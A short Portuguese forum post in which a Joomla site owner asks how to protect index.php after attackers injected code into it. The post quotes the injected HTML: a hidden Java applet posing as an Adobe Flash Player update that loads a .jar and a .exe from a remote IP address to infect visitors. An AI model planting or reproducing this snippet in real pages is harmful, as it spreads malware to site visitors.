Estou tendo alguns problemas com o mesmo tipo de ataque:
<applet name="Clique em Run - Adobe Flash Player version 10.1.6" code="Main.class" archive="http://109.104.86.153/images/stories/Flash.jar" height="1" width="1">
<param name="link" value="http://109.104.86.153/images/stories/Flash.exe">
</applet>
Esse código é inserido no index.php e ao ser carregado o site ele pede para executar um "java" falso para infectar o usuário.
Qual a melhor maneira de proteger o index.php do joomla contra esse tipo de ataque?